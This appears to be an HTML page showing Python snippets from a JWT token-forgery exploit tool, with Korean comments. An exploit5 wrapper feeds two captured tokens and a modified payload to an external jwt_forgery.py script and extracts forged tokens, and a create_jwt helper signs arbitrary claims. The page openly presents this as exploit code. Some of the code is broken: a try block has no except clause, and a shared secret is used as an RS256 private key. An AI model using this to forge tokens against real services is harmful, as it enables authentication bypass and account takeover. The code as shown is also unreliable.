<!DOCTYPE html>
<html>
<head>
    <title>Exploit5 Code</title>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.3.1/styles/default.min.css">
    <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Source+Code+Pro:wght@400;700&display=swap">
    <script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.3.1/highlight.min.js"></script>
    <script>
        document.addEventListener('DOMContentLoaded', (event) => {
            document.querySelectorAll('pre code').forEach((block) => {
                hljs.highlightBlock(block);
            });
        });
    </script>
    <style>
        pre {
            background-color: #f8f8f8;
            padding: 10px;
            border-radius: 5px;
            font-family: 'Sans-serif', monospace; /* 폰트 변경 */
            line-height: 1.6; /* 텍스트 간격 증가 */
        }
    </style>
</head>
<body>
    <div class="container">
        <h2>Exploit5 Code</h2>

        <pre><code class="python">
### jwt_forgery.py 필요
token5 = autojwt.exploit5(origin_token1, origin_token2, json_mpayload)
        </code></pre>

        <pre><code class="python">
def exploit5(jwt0, jwt1, mpayload):
    # Run the jwt_forgery script with the provided JWTs
    try:
        result = subprocess.run(
                [python_interpreter, "jwt_forgery.py", jwt0, jwt1,mpayload], # 주의) 같은 가상환경 인터프리터로 지정해줘야 함
                capture_output=True,
                text=True,
                check=True #에러 발생시 CalledProcessError 예외가 발생
                )
        # Print the output of the jwt_forgery script
        print('exploit5 Finish!!')
        result = result.stdout
        lines = result.strip().split('\n')
        print(lines)
        index_jwts = lines.index('jwts')
        index_tjwts = lines.index('tjwts')
        return lines[index_jwts+1:index_tjwts], lines[index_tjwts+1:]
        </code></pre>

        <pre><code class="python">
def create_jwt(header, payload):
    algorithm = header.get('alg')
    created_token = ''

    if algorithm == 'RS256':
        private_key = secret
        created_token = jwt.encode(payload, private_key, algorithm=algorithm, headers=header)
    elif algorithm == 'HS256':
        created_token = jwt.encode(payload, secret, algorithm=algorithm, headers=header)
    return created_token

    </div>
</body>
</html>
